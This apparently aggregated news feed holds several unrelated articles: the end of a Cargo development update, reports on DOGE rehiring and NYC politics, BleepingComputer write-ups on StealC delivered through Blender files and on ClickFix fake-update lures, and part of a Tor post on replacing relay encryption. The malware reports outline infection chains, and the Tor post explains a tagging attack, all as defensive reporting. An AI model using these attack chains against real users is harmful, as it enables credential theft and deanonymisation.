Cargo can't be everything to everyone, if for no other reason than the compatibility guarantees it must uphold. Plugins play an important part of the Cargo ecosystem and we want to celebrate them.

Our plugin for this cycle is cargo-wizard which can optimize your project for build times, runtime performance, or binary size.

Thanks to Kobzol for the suggestion!

Please submit your suggestions for the next post.

Implementation

Build performance guide

On Zulip , Kobzol floated the idea of a build performance guide being added to the Cargo book . The first thing we needed to work out was how to handle having small reviewable chunks while having enough content to justify the document. We decided to hold off on merging anything until the start of this development cycle. The guide was introduced in #15970 .

Ideally, this guide wouldn't be needed. In some cases, there are steps we can take to obsolete a section, like providing a meaningful unused dependency warning ( #15813 ) rather than suggesting tools that try to guess what dependencies are unused. In some cases, builds are slower by default as we try to balance several competing needs. However, even in those cases, we can evaluate whether we have the right balance or if there is another way to meet multiple needs (e.g. #15931 ). We decided to link out to this content to help raise awareness of these efforts to track them or participate.

Going forward, we are going to need to figure out how to balance what optimizations to include and how to talk about them. How do we vet that an optimization is actually beneficial? How much of an improvement is worth mentioning? How niche or tricky of an optimization is worth including? We dealt a little bit with this when adding documentation about linkers ( #15991 ) because some platforms already have fast linkers and making linking slightly faster than that is very different than switching from a slow linker to a faster one.

We're tracking further progress on this effort at #16119 .

Cargo Script

Update from 1.86

epage posted the stabilization report for the Rust frontmatter syntax, the first step towards stabilizing Cargo script. Cargo's frontmatter parser was also updated to better match rustc's whitespace handling ( #15975 ) and error messages ( #15952 , #15972 ).

build-dir ( docs ), which split out of target-dir in Cargo 1.91, was modeled off of Cargo script but implemented independently. In #16073 , Cargo script switched to using build-dir = "{cargo-cache-home}/build/{workspace-path-hash}" which is proposed to be the new build-dir default eventually ( #16147 ). However, this did lead to issues with memfd ( #16110 ) which still needs discussion. To match the semantics of build-dir being for internals, Cargo script's Cargo.lock was moved into build-dir ( #16087 ).

In preparing to stabilize Cargo script, the Cargo team talked through some of the open questions.

In #12870 , novafacing requested a way to get the script's original path. CARGO_MANIFEST_PATH was previously added but didn't meet everyone's needs. Nemo157 pointed out that ideally CLI parsers report the script, not the binary, in usage examples. There isn't really a way for libraries like clap to detect and work around this, requiring hacks on the user end. They suggested Cargo override arg[0] which is what CLI parsers use for usage examples. When we discussed this as a team, we were interested in people being able to get both pieces of information, the binary and the source. We were also concerned about platform support for setting arg[0] and current_exe . Granted, shebangs likewise aren't supported on every platform. Python and Ruby report arg[0] as the script but they have more control over the behavior. In the end, we decided on setting arg[0] where possible, on a best-effort basis. We will leave current_exe untouched to serve as the way to access the binary path. We would be open to people contributing support for more platforms, likely through contributing it to std . Setting of arg[0] was implemented in #16027 .

Cargo scripts do not support every manifest field, especially for the initial release. A long standing open question has been whether the manifest fields should be validated with an allowlist or a denylist. The concern is if a new field gets added, should we err on the side of it being supported or not? Forgetting to update the Cargo script allowlist on the release of a new feature is a poor experience. On the other hand, forgetting to update the denylist could mean we commit to a feature that we shouldn't support. The ideal solution is to rely on the type system to ensure we exhaustively handle the manifest fields. If that isn't possible, we erred on the side of an allowlist. Thankfully, the implementation had already been updated to make it easy to rely on the type system for this. The validation logic was changed in #16026 .

A cargo script's file name gets turned into a package.name but not every script name is a valid package.name . So far, Cargo has sanitized the file name into being a valid package.name . But valid according to whom? General Cargo commands, cargo new , or crates.io? So far, the cargo new rules had been implemented. This is important to decide upfront because the sanitization results are visible through the binary's name, cargo metadata , and --message-format json . As we stepped through each cargo new rule, we found they were becoming less relevant through other efforts in Cargo, changes in Windows, etc. We decided to do the bare minimum sanitization needed for general Cargo commands. During the implementation of #16120 , epage felt it was too premature to freely allow names that would collide with directory names from build-dir being overlaid with target-dir . Users can now move build-dir out in Rust 1.91 ( #15833 ). Changing this to be the default in Cargo is still under discussion ( #16147 ) and users could still move it back. Instead of sanitizing to avoid conflicts with build-dir content, epage let this fall back to existing validation rules that will error for now.

Public dependencies

Update from 1.76

While this feature is largely blocked on the lint within rustc, this was further refined in Cargo.

jneem experimented with Cargo rewriting the lint to provide Cargo-specific context in #16002 .

sadmac7000 changed cargo add s version auto-selection to evaluate public dependencies in case the user intends to use them together ( #15966 ).

JohnScience proposed cargo tree --edges no-external as a way to see only local packages ( #16043 ). We have this today in --depth workspace though maybe we could improve parts of our documentation about this. However, this got us to re-evaluate --depth public which walks through all public dependencies and no further (inspired by --depth workspace ). Would this be better served as --edges public ? The flag was originally added to help in analysing the lint's current behavior ( rust#119428 ). Most --edges opt-in specific edge types, while this would instead be applying a filter across edge types. The only other exception is no-proc-macros . We decided that we were comfortable adding more edge filters and decided to change this ( #16081 ).

Build-dir layout

Update from 1.90

Cargo's caches have traditionally been organized around the role they fulfil with .fingerprint/ housing the state for rebuild-detection for all packages while deps/ stores the build artifacts. This makes calling rustc easy, just pass it deps/ and it will figure out what files need to be loaded.

By mixing intermediate artifacts together like this,

  • if we were to GC the content, we'd need to track individual files for a build unit ( #5026 )
  • it is difficult to coordinate more granular locks ( #4282 )
  • it is more difficult to cache build unit artifacts across projects ( #5931 ).
  • requires Cargo to make the file names unique (except on Windows) ( #8332 )
    • and file collisions on Windows ( #8794 )
  • leads to bugs where project binaries can shadow system or Rust toolchain binaries on Windows because we have to put deps/ in PATH for linking ( #7919 )

The layout for intermediate build artifacts is an implementation detail which we can change. #15010 proposes changing the layout to be centered on the build unit the files belong to, rather than the role of the files. We have a single folder to track for GC, locking, and caching. A unique hash will be kept in the parent directory's name, allowing us to reduce collisions of files and shadowing of binaries on Windows. This new layout was implemented in #15947 .

There is a catch: many tools in the ecosystem depend on the layout. The reason ranger-ross added support for the new build-dir was to serve as an easy way for projects to test if they rely on internals of Cargo.

We can punt on finding alternative solutions to these projects, but that means each time we change the layout of the build-dir , there is an ecosystem cost. Turns out, we might want to change it multiple times. The build-dir is subdivided by <profile>/<platform>/ but that is mostly beneficial for locking purposes. If we had a new locking scheme ( #4282 ), we could reduce path lengths on Windows and allow intermediate artifact reuse between profiles and even platforms (e.g. build script builds). As I said earlier, the locking scheme is also blocked on the new layout. We either have to implement and stabilize them together or have two transitions. It doesn't stop there. A new locking scheme may be benefited by us moving away from mutable intermediate artifacts which could balloon disk usage as each build for each edit of your source would have a distinct artifact. This would be benefitted by aggressive GC of the intermediate artifacts which is also blocked on the new layout.

As a team, we discussed this tricky path towards stabilization of the new layout.

After talking through the interaction between these different features, we leaned towards doing one layout change without blocking on any other work and evaluating how that goes to see how we should handle further layout changes.

It would be great if crater could identify projects impacted by changing the layout. It may not help us when it is a build process extracting build.rs generated artifacts or when running the tool being built. There may be some -sys crate situations it might identify. Later, ehuss posted on Zulip some preliminary investigations into what projects might be doing relying on the build-dir layout. In addition to this type of inspection, we could change the layout on nightly-only to help identify impacted projects.

We are using build-dir as an opt-in for people to evaluate both changing it itself and as a smoke test for a new layout. Even once we change the build-dir location ( #16147 ), users will be able to opt-out. Should we do similar for the new layout itself? If we made the flag a proper config , this would give the build-dir layout more of a semblance of stability than is meant. This is also a maintenance burden. Supporting the two layouts already complicates things and has limited our changes to the new layout. Supporting the old layout for any period of time will likely require all features built on top of it to be conditioned on it until we are able to drop the old layout. A temporary environment variable to toggle the behavior may work.

At this point, it is on epage and ranger-ross to come up with a concrete transition plan.

Misc

Focus areas without progress

These are areas of interest for Cargo team members with no reportable progress for this development-cycle.

Ready-to-develop:

Planning:

How you can help

If you have ideas for improving cargo, we recommend first checking our backlog and then exploring the idea on Internals .

If there is a particular issue that you are wanting resolved that wasn't discussed here, some steps you can take to help move it along include:

  • Summarizing the existing conversation (example: Better support for docker layer caching , Change in Cargo.lock policy , MSRV-aware resolver )
  • Document prior art from other ecosystems so we can build on the work others have done and make something familiar to users, where it makes sense
  • Document related problems and solutions within Cargo so we see if we are solving to the right layer of abstraction
  • Building on those posts, propose a solution that takes into account the above information and cargo's compatibility requirements ( example )

We are available to help mentor people for S-accepted issues on Zulip and you can talk to us in real-time during Contributor Office Hours . If you are looking to help with one of the bigger projects mentioned here and are just starting out, fixing some issues will help familiarize yourself with the process and expectations, making things go more smoothly. If you'd like to tackle something without a mentor , the expectations will be higher on what you'll need to do on your own.

DoGE "cut muscle, not fat"; 26K experts rehired after brutal cuts

Hacker News
arstechnica.com
2025-11-24 22:12:04
Comments...
Original Article

Government brain drain will haunt US after DOGE abruptly terminated.

Billionaire Elon Musk, the head of the Department of Government Efficiency (DOGE), holds a chainsaw as he speaks at the annual Conservative Political Action Conference. Credit: SAUL LOEB / Contributor | AFP

After Donald Trump curiously started referring to the Department of Government Efficiency exclusively in the past tense, an official finally confirmed Sunday that DOGE “doesn’t exist.”

Talking to Reuters , Office of Personnel Management (OPM) Director Scott Kupor confirmed that DOGE—a government agency notoriously created by Elon Musk to rapidly and dramatically slash government agencies—was terminated more than eight months early. This may have come as a surprise to whoever runs the DOGE account on X, which continued posting up until two days before the Reuters report was published.

As Kupor explained, a “centralized agency” was no longer necessary, since OPM had “taken over many of DOGE’s functions” after Musk left the agency last May. Around that time, DOGE staffers were embedded at various agencies, where they could ostensibly better coordinate with leadership on proposed cuts to staffing and funding.

Under Musk, DOGE was hyped as planning to save the government a trillion dollars. On X, Musk bragged frequently about the agency, posting in February that DOGE was “the one shot the American people have to defeat BUREAUcracy, rule of the bureaucrats, and restore DEMOcracy, rule of the people. We’re never going to get another chance like this.”

The reality fell far short of Musk’s goals, with DOGE ultimately reporting it saved $214 billion—an amount that may be overstated by nearly 40 percent, critics warned earlier this year .

How much talent was lost due to DOGE cuts?

Once Musk left, confidence in DOGE waned as lawsuits over suspected illegal firings piled up . By June, Congress was divided, largely down party lines , on whether to codify the "DOGE process"—rapidly firing employees, then quickly hiring back whoever was needed—or declare DOGE a failure—perhaps costing taxpayers more in the long term due to lost talent and services.

Because DOGE operated largely in secrecy, it may be months or even years before the public can assess the true cost of DOGE’s impact. However, in the absence of a government tracker, the director of the Center for Effective Public Management at the Brookings Institution, Elaine Kamarck, put together what might be the best status report showing how badly DOGE rocked government agencies.

In June, Kamarck joined other critics flagging DOGE’s reported savings as “bogus.” In the days before DOGE’s abrupt ending was announced, she published a report grappling with a critical question many have pondered since DOGE launched: “How many people can the federal government lose before it crashes?”

In the report, Kamarck charted “26,511 occasions where the Trump administration abruptly fired people and then hired them back.” She concluded that “a quick review of the reversals makes clear that the negative stereotype of the ‘paper-pushing bureaucrat'” that DOGE was supposedly targeting “is largely inaccurate.”

Instead, many of the positions the government rehired were “engineers, doctors, and other professionals whose work is critical to national security and public health,” Kamarck reported.

About half of the rehires, Kamarck estimated, “appear to have been mandated by the courts.” However, in about a quarter of cases, the government moved to rehire staffers before the court could weigh in, Kamarck reported. That seemed to be “a tacit admission that the blanket firings that took place during the DOGE era placed the federal government in danger of not being able to accomplish some of its most important missions,” she said.

Perhaps the biggest downside of all of DOGE’s hasty downsizing, though, is a trend in which many long-time government workers simply decided to leave or retire, rather than wait for DOGE to eliminate their roles.

During the first six months of Trump’s term, 154,000 federal employees signed up for the deferred resignation program, Reuters reported , while more than 70,000 retired. Both numbers were clear increases (tens of thousands) over exits from government in prior years, Kamarck’s report noted.

“A lot of people said, ‘the hell with this’ and left,” Kamarck told Ars.

Kamarck told Ars that her report makes it obvious that DOGE “cut muscle, not fat,” because “they didn’t really know what they were doing.”

As a result, agencies are now scrambling to assess the damage and rehire lost talent. However, her report documented that agencies aligned with Trump’s policies appear to have an easier time getting new hires approved, despite Kupor telling Reuters that the government-wide hiring freeze is “over.” As of mid-November 2025, “of the over 73,000 posted jobs, a candidate was selected for only about 14,400 of them,” Kamarck reported, noting that it was impossible to confirm how many selected candidates have officially started working.

“Agencies are having to do a lot of reassessments in terms of what happened,” Kamarck told Ars, concluding that DOGE “was basically a disaster.”

A decentralized DOGE may be more powerful

“DOGE is not dead,” though, Kamarck said, noting that “the cutting effort is definitely” continuing under the Office of Management and Budget, which “has a lot more power than DOGE ever had.”

However, the termination of DOGE does mean that “the way it operated is dead,” and that will likely come as a relief to government workers who expected DOGE to continue slashing agencies through July 2026 at least, if not beyond.

Many government workers are still fighting terminations, as court cases drag on, and even Kamarck has given up on tracking due to inconsistencies in outcomes.

“It’s still like one day the court says, ‘No, you can’t do that,'” Kamarck explained. “Then the next day another court says, ‘Yes, you can.'” Other times, the courts “change their minds,” or the Trump administration just doesn’t “listen to the courts, which is fairly terrifying,” Kamarck said.

Americans likely won’t get a clear picture of DOGE’s impact until power shifts in Washington. That could mean waiting for the next presidential election, or possibly if Democrats win a majority in midterm elections, DOGE investigations could start as early as 2027, Kamarck suggested.

OMB will likely continue with cuts that Americans appear to want, as White House spokesperson Liz Huston told Reuters that “President Trump was given a clear mandate to reduce waste, fraud and abuse across the federal government, and he continues to actively deliver on that commitment.”

However, Kamarck’s report noted polls showing that most Americans disapprove of how Trump is managing government and its workforce , perhaps indicating that OMB will be pressured to slow down and avoid roiling public opinion ahead of the midterms.

“The fact that ordinary Americans have come to question the downsizing is, most likely, the result of its rapid unfolding, with large cuts done quickly regardless of their impact on the government’s functioning,” Kamarck suggested. Even Musk began to question DOGE. After Trump announced plans to appeal an electrical vehicle mandate that the Tesla founder relied on, Musk posted on X , “What the heck was the point of DOGE, if he’s just going to increase the debt by $5 trillion??”

Facing “blowback” over the most unpopular cuts, agencies sometimes rehired cut staffers within 24 hours, Kamarck noted, pointing to the Department of Energy as one of the “most dramatic” earliest examples. In that case, Americans were alarmed to see engineers cut who were responsible for keeping the nation’s nuclear arsenal “safe and ready.” Retention for those posts was already a challenge due to “high demand in the private sector,” and the number of engineers was considered “too low” ahead of DOGE’s cuts. Everyone was reinstated within a day, Kamarck reported.

Alarm bells rang across the federal government, and it wasn’t just about doctors and engineers being cut or entire agencies being dismantled, like USAID. Even staffers DOGE viewed as having seemingly less critical duties—like travel bookers and customer service reps—were proven key to government functioning. Arbitrary cuts risked hurting Americans in myriad ways, hitting their pocketbooks, throttling community services, and limiting disease and disaster responses, Kamarck documented.

Now that the hiring freeze is lifted and OMB will be managing DOGE-like cuts moving forward, Kamarck suggested that Trump will face ongoing scrutiny over Musk’s controversial agency, despite its dissolution.

“In order to prove that the downsizing was worth the pain, the Trump administration will have to show that the government is still operating effectively,” Kamarck wrote. “But much could go wrong,” she reported, spouting a list of nightmare scenarios:

“Nuclear mismanagement or airline accidents would be catastrophic. Late disaster warnings from agencies monitoring weather patterns, such as the National Oceanic and Atmospheric Administration (NOAA), and inadequate responses from bodies such as the Federal Emergency Management Administration (FEMA), could put people in danger. Inadequate staffing at the FBI could result in counter-terrorism failures. Reductions in vaccine uptake could lead to the resurgence of diseases such as polio and measles. Inadequate funding and staffing for research could cause scientists to move their talents abroad. Social Security databases could be compromised, throwing millions into chaos as they seek to prove their earnings records, and persistent customer service problems will reverberate through the senior and disability communities.”

The good news is that federal agencies recovering from DOGE cuts are “aware of the time bombs and trying to fix them,” Kamarck told Ars. But with so much brain drain from DOGE’s first six months ripping so many agencies apart at their seams, the government may struggle to provide key services until lost talent can be effectively replaced, she said.

“I don’t know how quickly they can put Humpty Dumpty back together again,” Kamarck said.

Ashley is a senior policy reporter for Ars Technica, dedicated to tracking social impacts of emerging policies and new technologies. She is a Chicago-based journalist with 20 years of experience.

Malicious Blender model files deliver StealC infostealing malware

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 22:00:45
A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. [...]...
Original Article

Malicious Blender model files deliver StealC infostealing malware

A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.

Blender is a powerful open-source 3D creation suite that can execute Python scripts for automation, custom user interface panels, add-ons, rendering processes, rigging tools, and pipeline integration.

If the Auto Run feature is enabled, when a user opens a character rig, a Python script can automatically load the facial controls and custom UI panels with the required buttons and sliders.

Despite the potential for abuse, users often activate the Auto Run option for convenience.

Researchers at cybersecurity company Morphisec observed attacks using malicious .blend files with embedded Python code that fetches a malware loader from a Cloudflare Workers domain.

Malicious Blender files
Source: Morphisec

The loader then fetches a PowerShell script that retrieves two ZIP archives, ZalypaGyliveraV1 and BLENDERX, from attacker-controlled IPs.

The archives unpack into the %TEMP% folder and drop LNK files in the Startup directory for persistence. Next, they deploy two payloads, the StealC infostealer and an auxiliary Python stealer, likely used for redundancy.

Overview of the attack chain
Source: Morphisec

Morphisec researchers report that the StealC malware used in this campaign was the latest variant of the second major version of the malware that was analyzed by Zscaler researchers earlier this year.

The latest StealC has expanded its data-stealing capabilities and supports exfiltration from:

  • 23+ browsers, with server-side credential decryption and compatibility with Chrome 132+
  • 100+ cryptocurrency wallet browser extensions and 15+ cryptocurrency wallet apps
  • Telegram, Discord, Tox, Pidgin, VPN clients (ProtonVPN, OpenVPN), and mail clients (Thunderbird)
  • Updated UAC bypass mechanism

Despite the malware being documented since 2023 , subsequent releases appear to remain elusive for anti-virus products. Morphisec comments that no security engine on VirusTotal detected the StealC variant they analyzed.

Given that 3D model marketplaces cannot scrutinize the code in user-submitted files, Blender users are advised to exercise caution when using files sourced from such platforms and should consider disabling the auto-execution of code.

You can do this from Blender > Edit > Preferences > uncheck the 'Auto Run Python Scripts' option.
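
If you would rather check or change this setting from a script (for example across several machines), the same preference is exposed through Blender's own Python API. A small sketch, assuming a reasonably recent (2.8+) Blender where the property is named use_scripts_auto_execute:

# Run in Blender's Python console, or: blender --background --python check_autorun.py
import bpy

prefs = bpy.context.preferences.filepaths
print("Auto Run Python Scripts:", "ENABLED" if prefs.use_scripts_auto_execute else "disabled")

prefs.use_scripts_auto_execute = False  # disable auto-execution of embedded scripts
bpy.ops.wm.save_userpref()              # persist the change

For a one-off session, launching Blender with the --disable-autoexec command-line option achieves the same thing without touching saved preferences.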

3D assets should be treated like executable files, and users should only trust publishers with a proven record. For everything else, it is recommended to use sandboxed environments for testing.

As the Sun Sets on Curbside Dining This Year, City Council Eyes Overhaul for 2026

hellgate
hellgatenyc.com
2025-11-24 21:27:59
A package of bills would bring back year-round curbside dining, increase the size of sidewalk cafes, and make the approval process easier....
Original Article

As restaurants tear down their outdoor dining structures for the winter, the City Council took up legislation that could make this the last year businesses are forced to carry out the costly ritual.

At a joint hearing of the City Council's Transportation and Worker and Consumer Protection Committees on Monday, lawmakers considered bills introduced by Councilmember Lincoln Restler that would once again allow roadway dining year-round , ending the prohibition from December through March that took effect last year.

"In just five days, roadway dining structures across the city of New York will disappear. Instead of New Yorkers safely enjoying a bite to eat outside, we will have thousands of parked cars, SUVs, trucks lining our streets," Restler said, referring to the November 29 deadline for restaurants to pack in their outdoor setups. "Who knows how many restaurants will manage to come back in April after the costly disassembly and storage fees this season." He added, "The new iteration of this program is failing our city."

Mayor-Elect Mamdani Says NYPD Spying on ICE Courtwatch Group Under Commissioner Tisch Is 'Deeply Troubling'

hellgate
hellgatenyc.com
2025-11-24 20:58:24
Mamdani said he will be speaking with Tisch, whom he is retaining in his administration, about the investigation....
Original Article

Since this summer, dozens of volunteers, including New York City Comptroller Brad Lander, have been sitting in on immigration court hearings in Lower Manhattan, bearing witness to ICE's kidnappings of immigrant New Yorkers. In addition to documenting the proceedings inside and outside of courtrooms, these courtwatchers aim to peacefully prevent ICE agents from detaining New Yorkers and separating families, by accompanying them out of courtrooms and courthouses.

Last week, it was revealed through a FOIA request that both the FBI and the NYPD have been spying on at least one Signal chat of immigrant rights activists who monitor immigration courts in Lower Manhattan. This collaboration has raised questions about the NYPD's coordination with federal immigration enforcement, as well as (once again) brought the NYPD's long history of often-illegal infiltration of political groups to the forefront.

On Monday afternoon, Mayor-elect Zohran Mamdani told Hell Gate that this type of spying and infiltration into courtwatch groups would not be acceptable under his administration.

ClickFix attack uses fake Windows Update screen to push malware

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 20:42:35
New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. [...]...
Original Article

ClickFix attack uses fake Windows Update screen to push malware

ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.

ClickFix is a social-engineering attack where users are convinced to paste and execute code or commands in the Windows Command Prompt that lead to running malware on the system.

The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with increasingly advanced and deceptive lures.

Fullscreen browser page

Since October 1st, researchers have observed ClickFix attacks where the pretense for executing dangerous commands was either completing the installation of a critical Windows security update or the more common "human verification" lure [ 1 , 2 ].

The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes commands from the attacker that were automatically copied to the clipboard via JavaScript running on the site.

Fake Windows security update screen
Source: BleepingComputer

A report from managed security services provider Huntress notes that the new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.

In one variant, the hackers use a human verification page, while in another they rely on the fake Windows Update screen.

In both cases, though, the threat actors used steganography to encode the final malware payload inside an image.

"Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory," Huntress researchers explain .

Delivering the final payload starts with using the mshta Windows-native binary to execute malicious JavaScript code.

The entire process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state.

Inside Stego Loader’s manifest resources, there is an AES-encrypted blob that is actually a steganographic PNG file containing shellcode that is reconstructed using custom C# code.
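
To make that reconstruction step concrete without reproducing the attacker's loader (and in Python rather than C#), the sketch below shows the general idea of pulling a byte stream back out of a single colour channel of a PNG using the Pillow library; the real loader additionally decrypts the recovered bytes and maps them straight into memory:

from PIL import Image

def bytes_from_channel(png_path: str, channel: int = 2) -> bytes:
    """Illustrative only: rebuild a byte stream from one colour channel
    (0 = red, 1 = green, 2 = blue) of every pixel, left to right, top to bottom.
    A stego loader would then decrypt this blob before executing it in memory."""
    image = Image.open(png_path).convert("RGB")
    return bytes(pixel[channel] for pixel in image.getdata())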

Huntress researchers noticed that the threat actor used a dynamic evasion tactic, commonly referred to as ctrampoline, where the entry-point function starts by calling 10,000 empty functions.

Trampoline call chain (image; source: Huntress)

The shellcode holding the infostealer samples is extracted from the encrypted image and is packed using the Donut tool that allows executing VBScript, JScript, EXE, DLL files, and .NET assemblies in memory.

After unpacking, Huntress researchers were able to retrieve the malware, which in the analyzed attacks was LummaC2 and Rhadamanthys.

The diagram below serves as a visual representation of how the entire attack works:

Overview of the attack (image; source: Huntress)

The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13 .

Huntress reports that, following the law enforcement operation, the payload is no longer being delivered from the fake Windows Update domains, although the domains themselves are still active.

To stay safe from this type of ClickFix attack, the researchers recommend disabling the Windows Run box and monitoring for suspicious process chains, such as explorer.exe spawning mshta.exe or PowerShell.

Additionally, when investigating a cybersecurity incident, analysts can check the RunMRU registry key to see if the user entered commands in the Windows Run box.
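
As a rough illustration of that last point, the sketch below (assuming a Windows host and Python's standard winreg module) lists the commands recorded under the current user's RunMRU key; error handling and output formatting are simplified.

# Sketch: list Run-box history from HKCU\...\Explorer\RunMRU (Windows only).
import winreg

RUNMRU = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

def list_runmru() -> list[tuple[str, str]]:
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU) as key:
        value_count = winreg.QueryInfoKey(key)[1]  # number of values under the key
        for i in range(value_count):
            name, value, _type = winreg.EnumValue(key, i)
            if name != "MRUList":  # MRUList only stores the ordering
                entries.append((name, value))
    return entries

if __name__ == "__main__":
    for name, command in list_runmru():
        print(name, command)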


Counter Galois Onion: Improved encryption for Tor circuit traffic

Lobsters
blog.torproject.org
2025-11-24 20:07:34
Comments...
Original Article

It's always a good day when we can talk about cryptography. Especially when we are sunsetting one of the oldest and most important encryption algorithms in Tor and replacing it with a research-backed new design, called Counter Galois Onion.

This overhaul will defend users against a broader class of online attackers (described below), and form the basis for more encryption work in the future.

Which cryptography are we talking about here?

The algorithm in question is Tor's relay encryption . While Tor uses the standard TLS protocol for communication between relays, and between clients and relays, it needs a specialized algorithm for encrypting user data as it traverses multiple relays in a circuit. 1

That's the relay encryption algorithm. The client shares a symmetric key with each relay on its circuit, and encrypts an outgoing message, or "relay cell" with each one of those keys. Each relay can remove a single layer of encryption, until the client's cell reaches the exit relay.

Of course, we need to make sure that the data isn't modified on the way from the client. For that, we include a cryptographic digest in the cell. The digest covers not only the cell itself, but also all previous cells sent through the circuit (to prevent re-ordering) and another secret shared key (to make the digest unpredictable).

So with the digest added, clients behave as follows: they calculate and set the digest, then they use a stream cipher (AES-128-CTR in Tor's case) multiple times to encrypt the cell for each relay.
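
As a rough sketch of the layering idea (ignoring the digest, the zero field, and Tor's exact cell format), here is how a client-side triple encryption with AES-128-CTR might look in Python using the cryptography package; the keys, nonces, and cell size here are simplifying assumptions, not Tor's real key schedule.

# Conceptual sketch of tor1-style layered encryption (digest and cell
# framing omitted; not Tor's actual wire format).
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def ctr_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    # The AES-CTR keystream depends only on (key, nonce), so applying this
    # function twice with the same parameters returns the original data.
    return Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor().update(data)

# One (key, nonce) pair shared with each of the three relays on the circuit.
hops = [(os.urandom(16), os.urandom(16)) for _ in range(3)]  # guard, middle, exit

cell = b"relay cell payload".ljust(509, b"\x00")  # pad to a fixed-size cell body

onion = cell
for key, nonce in reversed(hops):   # client: exit layer first, guard layer last
    onion = ctr_xor(key, nonce, onion)

for key, nonce in hops:             # relays: each one peels off a single layer
    onion = ctr_xor(key, nonce, onion)

assert onion == cell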

If we simplify a lot , then a relay cell looks a little like this:

Field         Width
Zero          2 bytes
Digest        4 bytes
Other stuff   ...

The "zero" field is there so that nodes other than the exit can avoid checking the digest: If a relay gets a cell with a value other than zero, then it can tell that it isn't the recipient of that cell, so it doesn't need to check the digest: it just decrypts the cell and forwards it to the next relay.

When we designed this algorithm, we didn't give it a name. Now that we're replacing it, it helps to have some way to identify it, so we're calling it "tor1".

Figure 1. The tor1 encryption algorithm, as used at a middle layer.

The input is a message M. A counter CTR is expanded via a pseudorandom function (PRF, instantiated with AES-128-CTR) to produce a stream of bytes. These bytes are xored with M to produce a ciphertext C.

Figure 2: The tor1 encryption algorithm, as used to originate a message.

The message M is mixed with the hash state HS, and a portion of the digest is appended to the message. The whole thing is then xored with the PRF (AES-128-CTR) to produce our ciphertext C.

Wait, that design looks funny!

Yeah, you wouldn't build it that way nowadays, would you? That's why we're replacing it.

In today's world of high-quality online courses and excellent introductory material , it's easy to forget the general state of accessible cryptography resources when Tor was getting started. AES was brand new , and authenticated encryption as a separate field of study had just started to emerge.

Existing designs weren't suitable for Tor's needs. The original onion routing paper didn't specify a means for authentication. Designs like mixmaster and mixminion were optimized for larger message sizes, and required a separate full digest for every possible layer of encryption. (For example, Mixmaster supported up to 20 remailers, so had to reserve space for 20 digests (and other stuff) in every message .)

Some of the "weird things" in the current tor1 design are outdated, but not awful ; others are things that are more valuable to resolve.

So, what are the problems with the tor1 design?

There are a few. First the big one:

Problem 1: Tagging attacks

Tagging attacks enable an active adversary to trace traffic by modifying it in one place on the network and observing predictable changes in another. Even when tagging attacks don't succeed immediately, their side effects can give the attacker more and more opportunities to retry.

This is the most important attack we're solving with CGO. Even without the other problems below, this one would be worth fixing on its own.

The main version of this attack arises because tor1's use of AES-CTR encryption with no hop-by-hop authentication means that the relay encryption is malleable . Since counter mode derives its ciphertext C by XORing a secret key stream S with the plaintext P (C = S ⊕ P), an attacker who can XOR their own pattern M in to the ciphertext will produce C' = (S ⊕ P) ⊕ M = S ⊕ (P ⊕ M) — that is, a valid encryption of (P ⊕ M).

An attacker can use this attack to confirm that they control both ends of the circuit. They XOR a pattern onto a cell at one end, and then see if any garbled cells at the other end become clear when they remove that same pattern. Any circuits with an honest endpoint will fail (and not be deanonymized), but the client will retry them until they eventually choose a malicious endpoint.

If the attacker chooses a known-plaintext portion of the relay cell for their marker (such as the header or slack zero space), then they can use their marker to communicate an identifier across the circuit, by retrieving it at the end:

 M = (P ⊕ M) ⊕ P.

M can then be used to transmit an IP address or unique identifier for the user.
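
A short Python sketch (again using AES-CTR from the cryptography package, with made-up keys and plaintext) shows the malleability directly: XORing a marker into the ciphertext XORs exactly the same marker into the decrypted plaintext.

# Demonstration of CTR malleability: C' = C xor M decrypts to P xor M.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, nonce = os.urandom(16), os.urandom(16)

def aes_ctr(data: bytes) -> bytes:
    # Same (key, nonce) keystream each call: encrypting twice is decrypting.
    return Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor().update(data)

plaintext = b"GET /index.html HTTP/1.1"
marker = bytes([0x41]) + bytes(len(plaintext) - 1)   # attacker's XOR pattern

ciphertext = aes_ctr(plaintext)
tampered = bytes(c ^ m for c, m in zip(ciphertext, marker))   # "tag" the cell

recovered = aes_ctr(tampered)   # what the far end of the circuit decrypts
assert recovered == bytes(p ^ m for p, m in zip(plaintext, marker))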

In comparison to probabilistic traffic correlation, this attack provides definite results immediately, with a strength multiplier: it also allows the attacker to ensure that all the traffic they successfully carry is fully deanonymized, before the circuit is used for any application traffic at all.

The downside for the attacker is that the resulting failure rate of circuits can be detected by the client. Currently, Tor clients emit log notices and warnings when circuit failure rates are excessively high. Unfortunately, as vigilant users have noticed, when the DDoS attacks on Tor become severe, these detectors give false alarms.

This class of attacks (where an adversary is able to abuse the Tor Protocol to transmit information between relays before application activity) is known as Internal Covert Channel attacks . Tor is in the process of updating its threat model to cover these attack vectors explicitly, along with two other categories of attack vectors.

Problem 2: Forward secrecy begins when a circuit closes

This attack and the one after it are much less severe than the tagging attack above; we mention them for the sake of completeness.

